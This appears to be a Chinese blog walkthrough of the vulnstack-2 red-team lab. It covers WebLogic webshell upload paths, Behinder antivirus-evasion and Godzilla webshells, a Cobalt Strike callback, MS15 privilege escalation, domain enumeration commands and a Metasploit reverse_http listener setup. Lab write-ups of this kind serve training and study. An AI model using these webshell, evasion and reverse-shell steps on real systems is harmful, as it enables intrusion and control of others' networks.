vlunstack-2（复现红日安全-ATT& CK实战）

环境搭建

配置信息

DC

IP：10.10.10.10

OS：Windows 2012(64)

应用：AD域

WEB

IP1：10.10.10.80

IP2：192.168.47.131

OS：Windows 2008(64)

应用：Weblogic 10.3.6MSSQL 2008

PC

IP1：10.10.10.201

IP2：192.168.47.130

OS：Windows 7(32)

攻击机

IP：192.168.47.128

WEB，PC 有360和防火墙

网络配置：

内网默认网段为10.10.10.1/24

DMZ默认网段为 192.168.111.1/24

管理员 Administrator / 1qaz@WSX

三台机子的默认密码都是1qaz@WSX，但是web这一台服务器默认密码登录会错误，解决办法是选择v1.3的快照，报错之后点击放弃，然后重启web虚拟机就可以进了。

同时需要在web机开启weblogic服务

内网

首先添加一个vm2的内网自定义，设置子网为10.10.10.1/24

当虚拟机开启时，会采用已经设定过的ip地址(必须符合10.10.10开头

将DC,PC,WEB 设为 vm2 （内网环境）

外网

内网设置好了，外网这样设置

我设置的外网连接方式为NAT

将攻击机，PC，WEB 外网设置为NAT，为了与kali在同一网段

PC与WEB做修改如下：

Dc:

Win

开启web服务

开启WEB的服务：管理员身份运行

C:\Oracle\Middleware\user_projects\domains\base_domain

信息收集

Nmap端口扫描

nmap -T4 -A -p 1-65535 192.168.163.137

由nmap扫描结果可知：

端口扫描

80，1433，3389，，7001，60966等

服务版本识别

IIS httpd 7.5，SQL Server 2008 R2 SP2，远程桌面服务，WebLogic Server

操作系统信息识别

Windows Server 2008 R2 - 2012

域

de1ay.com

工具检测发现漏洞

Dir查看路劲

查看进程

木马获取shell

weblogic上传木马路径选择：weblogic上传路径

方法1：把shell写到控制台images目录中:

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp //目录上传木马

访问 http://192.168.163.137:7001/console/framework/skins/wlsconsole/images/shell.jsp

方法2：写到uddiexplorer目录中

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\随机字符\war\shell.jsp //目录写入木马，

访问 http://...:7001/uddiexplorer/shell.jsp

方法3：在应用安装目录中

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp_WL_user\项目名\随机字符\war\shell.jsp //目录写入木马，

访问 http://...:7001/项目名/shell.jsp

这里选择第一种

上传木马

被360查杀了

给冰蝎做免杀

GitHub - Tas9er/ByPassBehinder: ByPassBehinder / 冰蝎WebShell免杀生成 / Code By:Tas9er

生成木马

C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

查看生成成功了

但是太老了还是被查杀了

只能关闭360了不然免杀都不会做

冰蝎尝试一直失败

用哥斯拉

连接成了

cs生成监听器反弹到cs客户端

哥斯拉上传cs木马文件

Cs端收到回连

接着用ms-15权限提升

域内信息

1). 本机信息收集

1). 本机信息收集

shell Systeminfo //查看操作系统信息

shell Ipconfig /all //查询本机ip段，所在域等

shell Whoami //查看当前用户权限

shell Net user //查看本地用户

shell Net localgroup administrators //查看本地管理员组(通常包含域用户)

得知web服务器为Windows server 2008 有两个网段

2). 域内信息收集

net config workstation // 查看当前计算机名，全名，用户名，系统版本，工作站域，登陆的域等

net view /domain // 查看域

net time /domain // 主域服务器会同时作为时间服务器

net user /domain // 查看域用户

net group /domain // 查看域内用户组列表

net group "domain computers" /domain // 查看域内的机器

net group "domain controllers" /domain // 查看域控制器组

net group "Enterprise Admins" /domain // 查看域管理员组

域名为de1ay.com 存在两台域主机web和pc 域控为DCde1ay.com主机名为DC，域管理员为Administrator

接下来将通过 Win7 跳板机，横向渗透拿下内网域内的域成员主机和域控主机。

内网安全：Cobalt Strike 与 MSF 联动（会话相互转移）_msfconsole的background挂起会话后怎么启动会话-CSDN博客https://blog.csdn.net/weixin_54977781/article/details/131178720?ops_request_misc=%7B%22request%5Fid%22%3A%22172250449416800213084897%22%2C%22scm%22%3A%2220140713.130102334.pc%5Fall.%22%7D&request_id=172250449416800213084897&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-131178720-null-null.142^v100^pc_search_result_base9&utm_term=cobalt strike4.7%E8%81%94%E5%8A%A8msf&spm=1018.2226.3001.4187

服务器安装msf

chmod 755 msfinstall.sh && ./msfinstall.sh

会话转移

（1）msfconsole // 打开 MSF 工具

（2）use exploit/multi/handler // 设置监听模块.

（3）set payload windows/meterpreter/reverse_http // 设置 payload

（4）set lport 4444 // 设置一个端口（和上面的监听一样的端口）

（5）set lhost 0.0.0.0 // 设置本地的 IP 地址

（6）exploit // 进行测试